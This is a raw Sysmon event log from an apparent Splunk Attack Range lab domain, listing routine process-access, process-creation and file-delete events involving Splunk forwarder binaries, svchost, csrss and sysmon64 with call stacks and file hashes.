10341000x8000000000000000291531Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:25.978{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-023D-6088-FA29-00000000BB01}2868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291530Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:25.978{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291529Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:25.978{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291528Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:25.978{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291527Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:25.978{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291526Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:25.978{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291525Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:25.978{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291524Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:25.978{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291523Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:25.978{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291522Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:25.978{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291521Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:25.978{BEA10069-D0C1-6086-0500-00000000BB01}416952C:\Windows\system32\csrss.exe{BEA10069-023D-6088-FA29-00000000BB01}2868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291520Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:25.978{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-023D-6088-FA29-00000000BB01}2868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000291519Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:25.979{BEA10069-023D-6088-FA29-00000000BB01}2868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000291518Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:25.878{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=684FE7A5E37CFD2E8FCB9D0D534560D8,SHA256=24611AD0010C9F18CFD4DDFE65211EB4D5F3E1E9A2549B3068F760EF0EAEF15A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440281Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:25.792{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0EE79291E23D78421C996DE53148DAB7,SHA256=683006CE8C5EA7C9664967AE808FF4968CA3421782556C4F35663A6342F0A927,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440280Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:25.549{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED50CABF0D541BC0A7DA0DFC95FE6AC2,SHA256=AFB5EB5CDC77843C7E5FAB796D9EFE65E50ABB713BB981523C7E17AA41003686,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291517Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:25.711{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=75926D5A254476C8079A9026E12502B1,SHA256=7C2DDC2906315833668347C85160588DD369A759D716A8BD8F907EAFA8CF663C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291516Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:25.492{BEA10069-023D-6088-F929-00000000BB01}27645748C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291515Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:25.361{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-023D-6088-F929-00000000BB01}2764C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291514Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:25.361{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291513Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:25.361{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291512Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:25.361{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291511Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:25.361{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291510Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:25.361{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291509Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:25.361{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291508Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:25.361{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291507Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:25.361{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291506Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:25.361{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291505Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:25.361{BEA10069-D0C1-6086-0500-00000000BB01}416432C:\Windows\system32\csrss.exe{BEA10069-023D-6088-F929-00000000BB01}2764C:\Program 